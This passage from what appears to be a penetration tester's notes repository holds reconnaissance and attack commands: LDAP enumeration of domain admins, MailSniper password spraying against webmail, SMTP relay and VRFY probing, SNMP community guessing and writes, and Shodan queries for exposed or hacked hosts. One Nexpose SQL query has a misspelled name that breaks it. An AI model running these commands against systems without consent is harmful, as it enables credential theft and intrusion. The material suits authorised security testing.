 31 | ---------------------------------------------------------------------------------------------------------------------
 32 | 
 33 | # LDAPdomainDump
 34 | 
 35 | ldapdomaindump -u domain\\username -p password --no-json --no-grep ldaps://ip$:port
 36 | ---------------------------------------------------------------------------------------------------------------------
 37 | 
 38 | # MailSniper
 39 | 
 40 | - Import the module.
 41 | PS C:\> ipmo C:\Tools\MailSniper\MailSniper.ps1
 42 | 
 43 | - Enumerate the NetBIOS name of the target domain.
 44 | PS C:\> Invoke-DomainHarvestOWA -ExchHostname <mail server IP>
 45 | 
 46 | PS C:\> Invoke-SelfSearch -Mailbox joe.smith@target.com -Remote
 47 | PS C:\> Invoke-SelfSearch -Mailbox joe.smith@target.com -ExchHostname webmail.target.com
 48 | 
 49 | - Perform a password spray.
 50 | PS C:\> Invoke-PasswordSprayOWA -ExchHostname mail.target.com -UserList C:\users.txt -Password Spring2022! -OutFile creds.txt
 51 | 
 52 | - Download the GAL.
 53 | PS C:\> GetGlobalAddressList -UserName domain\username -Password Spring2022! -ExchHostname webmail.target.com/ews/exchange.asmx -OutFile gal.txt
 54 | ---------------------------------------------------------------------------------------------------------------------
 55 | 
 56 | # Apache Directory Studio, using valid creds, port 636
 57 | 
 58 | File > New > LDAP Browser > LDAP Connection > Next
 59 | Connection name: 636
 60 | Hostname: target IP
 61 | Port: 636
 62 | Encryption method: Use SSL
 63 | Authentication Method: Simple Authentication
 64 | User: domain\user
Check Authentication
 65 | 
 66 | - Search
 67 | LDAP - New Search
 68 | Search Name: admin accounts
 69 | Connection > Browse: select the name you entered <636>
 70 | Search Base > Browse: select the root of the domain
 71 | Filter: (cn=admin*)
 72 | Returning Attributes: cn, mail, description
 73 | Search results may take a few seconds to return.
 74 | 
 75 | - Reuse a search
 76 | Expand Searches in the bottom left lane
 77 | Right-click > Copy Search
 78 | Select Search > right-click > Paste Search
 79 | Edit as needed > Apply and Close
 80 | ---------------------------------------------------------------------------------------------------------------------
 81 | 
 82 | # Enumerate anonymous or null binding
 83 | ldapsearch -x -H ldap://URI:port/ -b "searchbase" -s sub
 84 | 
 85 | # Enumerate anonymous or null binding
 86 | ldapsearch -x -b "dc=target,dc=com" "*" -h $ip | awk '/dn: / {print $2}'
 87 | 
 88 | # Unauthenticated Bind Enumeration (DN with no password)
 89 | ldapsearch -x -D "cn=admin,dc=target,dc=com" -s sub "cn=*" -h $ip | awk '/uid: /{print $2}' | nl
 90 | 
 91 | # Extract  users
 92 | ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=Users,DC=target,DC=com"
 93 | 
 94 | # Extract computers
 95 | ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=Computers,DC=<SUBDOMAIN>,DC=<TDL>"
 96 | 
 97 | # Extract my info
 98 | ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=<MY NAME>,CN=Users,DC=<SUBDOMAIN>,DC=<TDL>"
 99 | 
100 | # Extract domain admins
101 | ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TDL>"
102 | 
103 | # Extract administrators
104 | ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=Administrators,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"
105 | 
106 | # Extract remote desktop group
107 | ldapsearch -x -h <IP> -D 'DOMAIN\username' -w 'password' -b "CN=Remote Desktop Users,CN=Builtin,DC=<SUBDOMAIN>,DC=<TDL>"
108 | ---------------------------------------------------------------------------------------------------------------------
109 | 
110 | https://github.com/franc-pentest/ldeep
111 | https://github.com/codewatchorg/PowerSniper
112 | 


--------------------------------------------------------------------------------
/notes/maltego.txt:
--------------------------------------------------------------------------------
 1 | Maltego
 2 | 
 3 | 
 4 | # Install Transforms
 5 | 
 6 | Transforms > Transform Hub > install various Transforms
 7 | Note that some transforms require API keys.
 8 | 
 9 | ------------------------------------------------------------------------------------------------------------------------------------------------------
10 | 
11 | # Example 1
12 | 
13 | Investigate > New
14 | 
15 | From the palette on the left, scroll down to Infrastructure > Domain
16 | Drag the icon to the right.
17 | Edit the domain to your target.
18 | Right click > Run Transform > Email addresses from Domain > All
19 | 
20 | DNS from Domain > All
21 | ctrl + down to select servers > Resolve to IP > All
22 | ctrl + down to select IPs > DNS from IP > All
23 | ctrl + down to select servers > Convert to Domain > All
24 | ctrl + down to select domains > Email addresses from Domain > All
25 | Select all emails > Other transforms > To Person, emailToMyspaceAccount, emailToFlickerAccount
26 | ------------------------------------------------------------------------------------------------------------------------------------------------------
27 | 
28 | # Example 2
29 | 
30 | From the palette on the left, scroll down to Infrastructure > IPv4 Address
31 | Drag the icon to the right.
32 | Edit the IP address to your target.
33 | Right click > Run Transform > DNS from IP > All in this set
34 | ------------------------------------------------------------------------------------------------------------------------------------------------------
35 | 
36 | Add a Domain > edit name to your target (www.target.com)
37 | 
38 | # Example 3
39 | 
40 | Right-click > Run Transform > All Transforms > To Domain [Find other TLDs]
41 | Select all TLDs > Run Transform > All Transforms > To Website [Quick lookup]
42 | Select all websites > Run Transform > All Transforms > To IP Address [DNS]
43 | ------------------------------------------------------------------------------------------------------------------------------------------------------
44 | 
45 | # Example 4
46 | 
47 | Right-click > Run Transform > DNS from Domain > All in this set
48 | Select all > Run Transform > All Transforms > To IP Address [DNS]
49 | Select all IP addresses > Run Transform > All Transforms > To Netblock [Using whois info]
50 | 


--------------------------------------------------------------------------------
/notes/mobile.txt:
--------------------------------------------------------------------------------
 1 | Mobile App Testing for iOS
 2 | 
 3 | 
 4 | iOS 7.1.1
 5 | Pangu Jailbreak 1.2.0
 6 | http://cydiainstaller.net/download/install-cydia-ios-7-1-to-7-1-2/
 7 | 
 8 | Cydia
 9 | Run updates
10 | Install
11 |     OpenSSH
12 |     iFile
13 |     Apple File Conduit 2
14 | 
15 | ssh root@<targetIP>
16 | password: alpine
17 | 
18 | iExplorer $35
19 | www.macroplant.com/iexplorer
20 | 


--------------------------------------------------------------------------------
/notes/nexpose.txt:
--------------------------------------------------------------------------------
 1 | Nexpose
 2 | 
 3 | 
 4 | # Full Audit
 5 | 
 6 | # Exclude Vulnerabilities
 7 |     ICMP timestamp response
 8 |     NetBIOS NBSTAT Traffic Amplification
 9 |     TCP Sequence Number Approximation Vulnerability
10 |     TCP timestamp response
11 |     UDP IP ID Zero
12 | 
13 |     Exclude > Reason: Acceptable Risk > Submit and approve
14 | ------------------------------------------------------------------------------------------------------------------------------------------------------
15 | 
16 | # Create PDF reports
17 |     Audit Report
18 |     Executive Overview
19 |     Remediation Plan
20 |     Top Remediations with Details
21 | ------------------------------------------------------------------------------------------------------------------------------------------------------
22 | 
23 | # Create custom SQL query for Hosts
24 | 
25 | SELECT da.ip_address AS "IP Address", da.host_name AS "Host", 
26 |     dos.name AS "OS", dos.version AS "OS Version", 
27 |     das.port AS "Port", 
28 |     dp.name AS "Protocol", 
29 |     ds.name AS "Service", 
30 |     dsf.name AS "Name", dsf.version AS "Version"
31 | 
32 | FROM dim_asset_service das
33 |     JOIN dim_asset da USING (asset_id)
34 |     JOIN dim_operating_system dos USING (operating_system_id)
35 |     JOIN dim_protocol dp USING (protocol_id)
36 |     JOIN dim_service ds USING (service_id)
37 |     JOIN dim_service_fingerprint dsf USING (service_fingerprint_id)
38 | 
39 | ORDER BY da.ip_address, das.port
40 | ------------------------------------------------------------------------------------------------------------------------------------------------------
41 | 
42 | # Create custom SQL query for Findings
43 | 
44 | WITH
45 |     vulnerability_cves AS (
46 |         SELECT vulnerability_id, array_to_string(array_agg(reference), ',') AS cves
47 |         FROM dim_vulnerability_reference
48 |         WHERE source = 'CVE'
49 |         GROUP BY vulnerability_id
50 |     ),
51 |     vulnerability_disa_vmskey AS (
52 |         SELECT vulnerability_id, array_to_string(array_agg(reference), ',') AS disa_vmskey
53 |         FROM dim_vulnerability_reference
54 |         WHERE source = 'DISA_VMSKEY'
55 |         GROUP BY vulnerability_id
56 |     ),
57 |     ulnerability_disa_severity AS (
58 |         SELECT vulnerability_id, array_to_string(array_agg(reference), ',') AS disa_severity
59 |         FROM dim_vulnerability_reference
60 |         WHERE source = 'DISA_SEVERITY'
61 |         GROUP BY vulnerability_id
62 |     ),
63 |     rolled_up_solutions AS (
64 |         SELECT asset_id, vulnerability_id, COALESCE(dss.superceding_solution_id, davs.solution_id) AS solution_id
65 |         FROM dim_asset_vulnerability_solution davs
66 |         LEFT OUTER JOIN dim_solution_supercedence dss USING (solution_id)
67 |     )
68 | 
69 | SELECT ROUND(cvss_score::numeric, 1) AS "CVSS Score",
70 |     da.ip_address AS "IP Address", da.host_name AS "Host",
71 |     dos.name AS "OS", dos.version AS "OS Version",
72 |     dv.title AS "Vulnerability", proofAsText(dv.description) AS "Description",
73 |     proofAsText(favi.proof) AS "Proof",
74 |     ds.summary AS "Remediation",
75 |     proofAsText(ds.fix) AS "Steps",
76 |     vcves.cves AS "CVE",
77 |     disa_vmskey AS "DISA VMS Key",
78 |     disa_severity AS "DISA Severity"
79 | 
80 | FROM fact_asset_vulnerability_instance favi
81 |     JOIN dim_asset da USING (asset_id)
82 |     JOIN dim_operating_system dos USING (operating_system_id)
83 |     JOIN dim_vulnerability dv USING (vulnerability_id)
84 |     LEFT OUTER JOIN rolled_up_solutions sol USING (asset_id, vulnerability_id)
85 |     LEFT OUTER JOIN dim_solution ds USING (solution_id)
86 |     LEFT OUTER JOIN vulnerability_cves vcves USING (vulnerability_id)
87 |     LEFT OUTER JOIN vulnerability_disa_vmskey dvms USING (vulnerability_id)
88 |     LEFT OUTER JOIN vulnerability_disa_severity dvs USING (vulnerability_id)
89 | 
90 | ORDER BY da.ip_address, dv.title
91 | ------------------------------------------------------------------------------------------------------------------------------------------------------
92 | 
93 | # Create custom SQL query for all vulnerabilities
94 | 
95 | SELECT title AS "Title", ROUND(cvss_score::numeric, 1) AS "CVSS Score"
96 | FROM dim_vulnerability
97 | ORDER BY title
98 | 


--------------------------------------------------------------------------------
/notes/nmap-fire.txt:
--------------------------------------------------------------------------------
  1 | # TCP services & ports
  2 | 
  3 | afp                              548
  4 | ajp                              8009
  5 | amqp                             5672
  6 | apache_hbase                     60010,60030
  7 | apple_remote_event               3031
  8 | bitcoin                          8332,8333
  9 | cassandra                        9160
 10 | cccam                            12000
 11 | clamav                           3310
 12 | cobra                            1050
 13 | couchbase_web_administration     8091
 14 | couchdb                          5984
 15 | cups                             631
 16 | daytime                          13
 17 | dahua_dvr                        37777
 18 | db                               523,1433,1521,3306,5432,5984,7210,27017
 19 | dict                             2628
 20 | distributed_compiler_daemon      3632
 21 | docker                           2375,2376
 22 | drda                             50000
 23 | erlang_port_mapper               4369
 24 | finger                           79
 25 | fins                             9600
 26 | flume                            35871
 27 | ftp                              21
 28 | gkrellm                          19150
 29 | gopher                           70
 30 | gps                              2947
 31 | hadoop                           50030,50060,50070,50075,50090
 32 | hard_disk_info                   7634
 33 | icap                             1344
 34 | imap                             143,993
 35 | ipmi                             623
 36 | iscsi                            3260
 37 | java_debug_wire_protocol         9999
 38 | ldap                             389,636
 39 | lexmark                          9100
 40 | lotus_domino                     1352
 41 | max_db                           7210
 42 | mcafee_epo                       8081
 43 | memory_object_caching            11211
 44 | mongodb                          27017
 45 | mqtt                             1883
 46 | ms-sql                           1433
 47 | mysql                            3306
 48 | nagios                           5666
 49 | netbus                           12345
 50 | network_data_management          10000
 51 | nfs                              2049
 52 | nntp_ntlm_info                   119,433,563
 53 | novell_netware_core_protocol     524
 54 | openlookup                       5850
 55 | oracle                           1521
 56 | pcworx                           1962
 57 | pop3                             110,995
 58 | postgres                         5432
 59 | pptp                             1723
 60 | qnx_qconn                        8000
 61 | redis                            6379
 62 | remote_desktop                   3389
 63 | rmi_registry                     1099
 64 | rpc                              111
 65 | rsync                            873
 66 | rtsp                             554
 67 | s7_info                          102
 68 | sip                              5060
 69 | smb                              445
 70 | smb_vulns                        139
 71 | smtp                             25,465,587
 72 | socks                            1080
 73 | ssh                              22
 74 | supermicro_ipmi_conf             49152
 75 | telnet                           23
 76 | time                             37
 77 | tridium niagara fox              1911
 78 | versant                          5019
 79 | vnc                              5900
 80 | voldemort                        6666
 81 | web                              80,443,8000,8080,8443,8888
 82 | x11                              6000
 83 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 84 | 
 85 | # UDP services & ports
 86 | 
 87 | backorifice                      31337
 88 | bacnet_info                      47808
 89 | citrix                           1604
 90 | coap                             5683
 91 | db2                              523
 92 | dhcp                             67
 93 | dns                              53
 94 | dns_service_discovery            5353
 95 | enip_info                        44818
 96 | freelancer                       2302
 97 | ike                              500
 98 | ipim                             623
 99 | knx_gateway_info                 3671
100 | motorola                         407
101 | ms-sql                           1434
102 | netbios                          137
103 | ntp                              123
104 | omron_info                       9600
105 | scada_digi                       2362
106 | snmp                             161
107 | stun                             3478
108 | sun_service_tags                 6481
109 | upnp                             1900
110 | xworks                           17185
111 | 


--------------------------------------------------------------------------------
/notes/osx.txt:
--------------------------------------------------------------------------------
 1 | OS X
 2 | 
 3 | 
 4 | # Add color to terminal
 5 | 
 6 | sudo nano /etc/profile
 7 | Add
 8 | export CLICOLOR=1
 9 | export LSCOLORS=ExFxBxDxCxegedabagacad
10 | ------------------------------------------------------------------------------------------------------------------------------------------------------
11 | 
12 | # Boot options
13 | 
14 | c
15 | option                                  Select boot device
16 | Apple r                                 Recovery mode
17 | Apple s                                 Single user mode
18 | 
19 | Terminal > resetpassword
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | # Cannon 8612 UPD broadcast
23 | 
24 | killall CIJScannerRegister
25 | sudo rm  -rf /Library/Image\ Capture/Support/LegacyDeviceDiscoveryHelpers/
26 | ------------------------------------------------------------------------------------------------------------------------------------------------------
27 | 
28 | # Homebrew
29 | 
30 | /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
31 | 
32 | brew install curl
33 | brew install wget --with-libressl
34 | 
35 | brew install proxychains-ng
36 | nano /usr/local/etc/proxychains.conf
37 | socks5  127.0.0.1    1080               Add to the bottom
38 | 
39 | ssh -D 1080 -f -C -q -N user@target
40 | proxychains4 curl http://target.com
41 | 
42 | - Troubleshooting
43 | brew update
44 | brew update                             Run twice
45 | brew doctor
46 | ------------------------------------------------------------------------------------------------------------------------------------------------------
47 | 
48 | # PATH
49 | 
50 | $PATH                                   Show contents of PATH
51 | ~/.profile                              Edit PATH
52 | ------------------------------------------------------------------------------------------------------------------------------------------------------
53 | 
54 | # SIP
55 | 
56 | Reboot > command R
57 | Terminal
58 | csrutil disable; reboot
59 | 
60 | Terminal
61 | java -version
62 | More Info
63 | 
64 | Reboot > command R
65 | Terminal
66 | csrutil enable
67 | reboot
68 | 
69 | csrutil status
70 | System Integrity Protection status: enabled.
71 | ------------------------------------------------------------------------------------------------------------------------------------------------------
72 | 
73 | # Update locate database
74 | 
75 | sudo /usr/libexec/locate.updatedb
76 | 


--------------------------------------------------------------------------------
/notes/shodan.txt:
--------------------------------------------------------------------------------
  1 | Shodan
  2 | 
  3 | 
  4 | # GUI search operators
  5 | 
  6 | Country          country:US
  7 |                  Must use 2 letters for sthe country codes: https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2
  8 | 
  9 | State            state:TN
 10 | 
 11 | City             city:Nashville
 12 | 
 13 | Organization     org:"ACME Corp"
 14 | 
 15 | Hostname         hostname:google
 16 |                  hostname:.nist.gov
 17 |                  hostname:.edu
 18 | 
 19 | Network          net:172.16.0.0/16
 20 | 
 21 | OS               os:"windows 7"
 22 | 
 23 | Port             port:21
 24 |                  -port:22
 25 | 
 26 | Product          product:openssh
 27 | 
 28 | Timeframe        before:31/12/2022 after:10/12/2022
 29 | 
 30 | Dorks            "Additional Interfaces"
 31 |                  "All Storage Devices" IPC$
 32 |                  "Authentication: disabled" port:"445"
 33 |                  "Cisco 3750"
 34 |                  "Cisco 7606"
 35 |                  "Original Siemens Equipment"
 36 | 				
 37 | Filters          all:comments
 38 |                  all:compromised
 39 |                  all:hacked
 40 | 
 41 | Example          country:mx city:"Playa del Carmen" port:445 all:comments
 42 | ----------------------------------------------------------------------------------------------------------------------------------------------
 43 | 
 44 | # CLI
 45 | 
 46 | shodan init <API key>
 47 | 
 48 | shodan download --limit 200 nginx.json.gz product:nginx
 49 | 
 50 | shodan convert <data file> <file format>
 51 | shodan convert nginx.json.gz xlsx
 52 | 
 53 | shodan stats --facets org ssl.version:sslv2 http country:us
 54 | shodan stats --facets org port:3389 country:us
 55 | 
 56 | shodan stats --facets ssl.version has_ssl:true http country:us 
 57 | shodan stats --facets ssl.cert.fingerprint has_ssl:true http country:us 
 58 | shodan stats --facets ssl.cert.fingerprint:100 has_ssl:true http country:us 
 59 | 
 60 | shodan download --limit -1 hacked 'http.title:"hacked by"'
 61 | 
 62 | shodan parse --fields ip_str,product,title test.json.gz
 63 | 
 64 | shodan convert remote-desktops.json.gz images
 65 | 
 66 | shodan count port:22 country:US
 67 | shodan host <target IP>
 68 | shodan stats --facets country <service>     example: apache
 69 | 
 70 | shodan count port:22 country:US
 71 | shodan count microsoft iis 6.0
 72 | 
 73 | shodan download test microsoft iis 6.0
 74 | 
 75 | shodan search --fields ip_str,port,org,hostnames microsoft iis 6.0
 76 | shodan stats --facets country <service>     example: apache
 77 | 
 78 | shodan search --fields location.country_code,ip_str,port,org,hostnames <search term>
 79 | 
 80 | shodan stats --facets country,org <search term>
 81 | shodan stats --facets org country:<country code> <search term>
 82 | shodan search org:<organization> country:<country code> <search term>
 83 | 
 84 | shodan stats --facets port country:us
 85 | 
 86 | shodan stats --facets org country:us ssl.version:sslv2
 87 | 
 88 | shodan count country:us state:tn city:nashville
 89 | shodan stats --facets org country:us state:tn city:nashville
 90 | shodan search country:us state:tn city:nashville port:23
 91 | 
 92 | shodan count "All Storage Devices"
 93 | shodan stats --facets country "All Storage Devices"
 94 | shodan search "All Storage Devices"
 95 | 
 96 | shodan count city:Nashville "Authentication: disabled"
 97 | shodan search city:Nashville "Authentication: disabled" > smb.json
 98 | shodan search product:openssh -port:22
 99 | 
100 | shodan stats --facets org port:3389 country:us
101 | 
102 | shodan download --limit 200 product:nginx
103 | shodan download --limit -1 test 'http.title:"hacked by"'
104 | shodan parse --fields title test.json.gz
105 | shodan parse --fields ip_str,product,title test.json.gz
106 | shodan parse --fields ip_str,port,org --separator , test.json.gz
107 | 
108 | shodan convert <data file> <file format>
109 | shodan convert nginx.json.gz xlsx
110 | shodan convert remote-desktops.json.gz images
111 | 
112 | shodan scan submit <target IP>
113 | shodan scan submit --filename test.json.gz <CIDR>
114 | shodan parse test.json.gz
115 | ----------------------------------------------------------------------------------------------------------------------------------------------
116 | 
117 | #!/bin/bash
118 | shodan init <API key>
119 | echo "Gathering Shodan info on the following targets:"
120 | 
121 | for i in $(cat targets.txt); do
122 |      echo $i
123 |      shodan host $i >> shodan.txt
124 | done
125 | 


--------------------------------------------------------------------------------
/notes/smtp.txt:
--------------------------------------------------------------------------------
 1 | SMTP
 2 | 
 3 | 
 4 | # SMTP relay, EXPN/VRFY command enabled
 5 | 
 6 | telnet <target IP> 25
 7 | EHLO root
 8 | MAIL FROM:root@target.com
 9 | RCPT TO:jsmith@gmail.com
10 | DATA
11 | Subject: Testing open mail relay.
12 | Testing SMTP open mail relay. Have a nice day.
13 | .
14 | QUIT
15 | 
16 | for x in $(cat users.txt); do echo VRFY $x | nc -nv -w 1 <target IP> 25 2>/dev/null | grep ^’250’; done
17 | ------------------------------------------------------------------------------------------------------------------------------------------------------
18 | 
19 | sendemail -f root@target.com -t jsmith@gmail.com -u Testing open mail relay. -m Testing SMTP open mail relay. Have a nice day. -s <target IP>
20 | 
21 | SMTP Service STARTTLS Plaintext Command Injection
22 | 
23 | telnet <target IP> 25
24 | S: <waits for connection on TCP port 25>
25 | C: <opens connection>
26 | S: 220 mail.target.com SMTP service ready
27 | C: EHLO mail.ietf.org
28 | S: 250-mail.target.com offers a warm hug of welcome
29 | S: 250 STARTTLS
30 | C: STARTTLS
31 | S: 220 Go ahead
32 | ------------------------------------------------------------------------------------------------------------------------------------------------------
33 | 
34 | # Internal IPs
35 | 
36 | When viewing test email, view the full headers and look for internal IPs and host names.
37 | ------------------------------------------------------------------------------------------------------------------------------------------------------
38 | 
39 | STARTTLS\r\nRSET\r\n
40 | 
41 | And the server sent the following two responses:
42 | 220 Server ready Ready to start TLS
43 | 250 +OK Reset
44 | ------------------------------------------------------------------------------------------------------------------------------------------------------
45 | 
46 | HELO <anything>
47 | Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
48 | Unknown domain - mail from: <user@unknown_domain>
49 | Domain not present - mail from: <user@localhost>
50 | Domain not supplied - mail from: <user>
51 | Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
52 | Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
53 | Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
54 | User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
55 | Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
56 | Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
57 | ------------------------------------------------------------------------------------------------------------------------------------------------------
58 | 
59 | #!/bin/bash
60 | clear
61 | 
62 | echo "SMTP open mail relay checker."
63 | 
64 | if [[ $1 == "" ]]; then
65 |     echo "ERROR - Specify host."
66 | else
67 |     if [[ $2 == "" ]]; then
68 |         PORT=25
69 |     else
70 |         PORT=$2
71 |     fi
72 | 
73 |     cat >> tmp << EOF
74 |     mail from: root@target.com
75 |     rcpt to: jsmith@gmail.com
76 |     data
77 |     Subject: Testing open mail relay.
78 |     Testing SMTP open mail relay from $1.
79 |     Have a nice day.
80 |     .
81 |     quit
82 |     EOF
83 | 
84 |     echo "[*] Using target $1:$PORT"
85 |     cat tmp | nc $1 $PORT
86 |     rm tmp
87 | fi
88 | 


--------------------------------------------------------------------------------
/notes/snmp.txt:
--------------------------------------------------------------------------------
 1 | SNMP
 2 | 
 3 | 
 4 | # Default or Guessable SNMP Community Strings
 5 | 
 6 | onesixtyone -c <password list> -i 161.txt
 7 | 
 8 | snmpcheck -t <target IP> <private/public>
 9 | ------------------------------------------------------------------------------------------------------------------------------------------------------
10 | 
11 | # Management Information Bases (MIB) Tree
12 | 
13 | 1.3.6.1.2.1.25.1.6.0       System processes
14 | 1.3.6.1.2.1.25.4.2.1.2     Running programs
15 | 1.3.6.1.2.1.25.4.2.1.4     Processes path
16 | 1.3.6.1.2.1.25.2.3.1.4     Storeage units
17 | 1.3.6.1.2.1.25.6.3.1.2     Software name
18 | 1.3.6.1.4.1.77.1.2.25      Windows user accounts
19 | 1.3.6.1.2.1.6.13.1.3       Windows TCP ports
20 | 
21 | # Read-only Community String of 'public'
22 | 
23 | snmpwalk -c public -v1 <target IP> <MIB>
24 | ------------------------------------------------------------------------------------------------------------------------------------------------------
25 | 
26 | # Modify a variable
27 | 
28 | snmpset -v <version> -c <community string> <target IP> <variable> s "<new string>"
29 | 


--------------------------------------------------------------------------------
/notes/ssl-setup.txt:
--------------------------------------------------------------------------------
 1 | Setup SSL on AWS
 2 | 
 3 | - AWS
 4 | EC2 > Security Groups > sg-xxxxxxxx - default
 5 | Edit inbound rules
 6 | Add rule
 7 | HTTP, 80, 0.0.0.0/0
 8 | Add rule
 9 | HTTPS, 443, 0.0.0.0/0
10 | 
11 | - Apache service
12 | service apache2 start                      Start Apache
13 | update-rc.d apache2 enable                 Enable Apache to start at boot time
14 | 
15 | - Apache web root
16 | mkdir -p /var/www/html/acme.org            Place all your files here
17 | sudo adduser $USER www-data                While logged in as ec2-user
18 | sudo chown $USER:www-data -R /var/www
19 | 
20 | - Install SSL cert
21 | apt install certbot
22 | certbot certonly
23 | 2                                          Place files in webroot directory
24 | acme.org                                   Domain name
25 | /var/www/html/acme.org                     Webroot
26 | 
27 | Certificate                                /etc/letsencrypt/live/acme.org/fullchain.pem
28 | Key                                        /etc/letsencrypt/live/acme.org/privkey.pem
29 | 
30 | - Apache config
31 | cd /etc/apache2/sites-available
32 | vi acme.org.conf
33 | 
34 | <VirtualHost *:80>
35 |     RewriteEngine On
36 |     RewriteRule ^(.*)$ https://%{HTTP_HOST}$1 [R=301,L]
37 | </VirtualHost>
38 | 
39 | <VirtualHost *:443>
40 |     ServerAdmin webmaster@localhost
41 |     ServerName acme.org
42 |     ServerAlias www.acme.org
43 |     DocumentRoot /var/www/html/acme.org
44 |     ErrorLog ${APACHE_LOG_DIR}/error.log
45 |     CustomLog ${APACHE_LOG_DIR}/access.log combined
46 | 
47 |     SSLEngine               on
48 |     SSLProtocol             all -TLSv1.1
49 |     SSLHonorCipherOrder     off
50 |     SSLSessionTickets       off
51 |     SSLCertificateFile /etc/letsencrypt/live/acme.org/fullchain.pem
52 |     SSLCertificateKeyFile /etc/letsencrypt/live/acme.org/privkey.pem
53 | 
54 |     SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384
55 | 
56 |     Protocols h2 http/1.1
57 | 
58 |     Header always set Permissions-Policy "none"
59 |     Header always set Referrer-Policy "no-referrer-when-downgrade"
60 |     Header always set Strict-Transport-Security "max-age=63072000"
61 |     Header always set X-Content-Type-Options "nosniff"
62 |     Header always set X-Frame-Options "SAMEORIGIN"
63 | </VirtualHost>
64 | 
65 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
66 | 
67 | a2enmod ssl                                Enable SSL
68 | a2enmod ssl rewrite headers http2
69 | a2dissite 000-default.conf                 Disable the default site
70 | a2ensite acme.org.conf                     Enable new site
71 | apache2ctl configtest                      Test for configuration errors
72 | systemctl restart apache2                  Restart Apache
73 | 
74 | apache2ctl -M                              Verity the ssl_module is running
75 | netstat -antp                              Verify ports 80 and 443 are listening
76 | 
77 | xdg-open http://www.acme.org               Verify redirect and SSL are working
78 | 


--------------------------------------------------------------------------------
/notes/ssl.txt:
--------------------------------------------------------------------------------
 1 | SSL
 2 | 
 3 |  
 4 | Redirect
 5 | Examine the response of a 301 message or Javascript.
 6 | curl -vvvv http://target.com
 7 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 8 | 
 9 | Renegotiating (NULL-SHA or NULL-MD5)
10 | 
11 | sslscan --no-failed <target IP>
12 | 
13 | sslscan --no-failed --targets=443.txt
14 | 
15 | openssl s_client -connect target:443
16 | 
17 | telnet <target IP> 443
18 | GET / HTTP/1.0
19 | R
20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
21 | 
22 | cat 443.txt | while read -r IP port; do echo "----START "$IP":"$port"----"; echo -e "HEAD / HTTP/1.0\nR\n\n" | ncat --ssl "$IP" "$port"; echo -e "\$
23 | 


--------------------------------------------------------------------------------
/notes/terraform.txt:
--------------------------------------------------------------------------------
  1 | Terraform
  2 | 
  3 | 
  4 | - Create a new IAM AWS user and keys
  5 | Login to AWS
  6 | Search for IAM > Users > Add users
  7 | Enter a user name > select Access key > Next
  8 | Add user to group > Create group
  9 | Enter a group name: deploy
 10 | Search for AdministratorAccess under permissions policies (one word)
 11 | Select the policy > Create group > Next > Create user
 12 | Select Show > copy both keys
 13 | 
 14 | Goto EC2 > Key pairs > Create key pair
 15 | Name it deploy > select RSA > .pem > Create key pair
 16 | The .pem file should auto download.
 17 | Move the file to ~/.ssh/
 18 | cd ~/.ssh
 19 | chmod 600 deploy.pem
 20 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 21 | 
 22 | - Install AWS CLI on Kali
 23 | apt install -y awscli
 24 | aws --version
 25 | 
 26 | - Configure AWS CLI
 27 | aws configure
 28 | AWS Access Key ID [None]: <key>
 29 | AWS Secret Access Key [None]: <key>
 30 | Default region name [None]: us-east-1         # Use your default region
 31 | Default output format [None]: json
 32 | This info is stored in ~/.aws/
 33 | 
 34 | - Install Terraform on Kali
 35 | https://www.terraform.io/downloads
 36 | Click Linux > Amd64
 37 | cd /home/kali/Downloads
 38 | unzip terraform_1.2.7_linux_amd64.zip
 39 | sudo mv terraform /usr/local/bin/
 40 | ------------------------------------------------------------------------------------------------------------------------------------------------------
 41 | 
 42 | - Download and configure JetBrains PyCharm
 43 | https://www.jetbrains.com/pycharm/download/#section=linux
 44 | File > Settings > Plugins > Marketplace
 45 | Search for Ansible > Install > Accept
 46 | Search for Terraform > Install > OK
 47 | 
 48 | - Getting started
 49 | cd /home/kali
 50 | mkdir deploy
 51 | PyCharm > Open > /home/kali/deploy > OK > Trust Project
 52 | In the left column, right click on main.py > Delete > OK
 53 | File > New > File: main.tf
 54 | Copy/paste the following config
 55 | 
 56 | terraform {
 57 |   required_providers {
 58 |     aws = {
 59 |       source  = "hashicorp/aws"
 60 |       version = "~> 4.16"
 61 |     }
 62 |   }
 63 | 
 64 |   required_version = ">= 1.2.0"
 65 | }
 66 | 
 67 | provider "aws" {
 68 |   region = "us-east-1"
 69 | }
 70 | 
 71 | resource "aws_instance" "payload" {
 72 |   ami           = "ami-052efd3df9dad4825"     # Ubuntu for corresponding region
 73 |   instance_type = "t2.micro"
 74 |   key_name      = "deploy"                    # Key created via GUI in AWS
 75 | 
 76 |   tags = {
 77 |     Name = "Payload"
 78 |   }
 79 | }
 80 | ----------------------------------------------------------
 81 | 
 82 | File > New > File: outputs.tf
 83 | Copy/paste the following config
 84 | 
